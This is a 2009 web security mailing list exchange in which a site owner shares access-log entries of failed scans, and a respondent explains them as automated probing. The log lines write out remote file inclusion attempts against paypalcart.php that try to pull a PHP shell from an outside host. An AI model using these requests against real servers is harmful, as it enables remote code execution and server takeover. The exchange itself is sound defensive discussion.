WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: 404 messages pointing to a strange location

From: Simon <sunsetpicture () gmail com>
Date: Sat, 03 Jan 2009 20:29:40 +0100
Hi Stefan,
Thanks for you answer. I honestly didn't dare to take a look at the txt file ;), but in this case, it had certainly been interesting.
As I already mentioned in the mail to Tom, the directory /ju-album contains html pages with links to the Exhibit Engine, so perhaps that's the reason why someone run the scan.
Here are the first 8 GET requests (46 in total) from the server log. The IP changes again and again, but it's more or less always the same URLs it tried to visit.
87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET /ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5971 "-" "libwww-perl/5.805" 87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET //ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5898 "-" "libwww-perl/5.805" 87.106.245.44 - - [01/Jan/2009:21:55:33 +0100] "GET /ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5934 "-" "libwww-perl/5.805" 194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET /ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5945 "-" "libwww-perl/5.814" 194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET //ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5905 "-" "libwww-perl/5.814" 194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET /ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5941 "-" "libwww-perl/5.814" 87.106.245.44 - - [01/Jan/2009:22:08:13 +0100] "GET /ju-album/slides/DSC_5633.html//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 6022 "-" "libwww-perl/5.805" 

I hope this helps :)

Simon

Stefan Tanase wrote:

Hello Simon,

Simon wrote:
Yesterday evening I had lots of 404-messages from my web server, all pointing to locations like http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
ID3 is a well known PHP shell - PHP shells are scripts used by "bad guys" to gain access to your web server through an exploitable page in your website, for example through a vulnerable include statement. 


I don't use paypal or anything similar on my page; what does that mean?
They are usually scanning thousands of web servers in search of the same vulnerabilities. You may not be using those vulnerable scripts (like paypalcart.php in this case) but some other webmasters may do :)
I'm wondering because this messages came in only yesterday before midnight, several dozens.
Popular websites get requests like this 24/7 - it's just a matter of time until your server is found and they start scanning it for vulnerabilities.
It's a good idea to keep an watch on this stuff, so you can make sure your websites are not vulnerable. 

Cheers,



-------------------------------------------------------------------------
Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! 
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: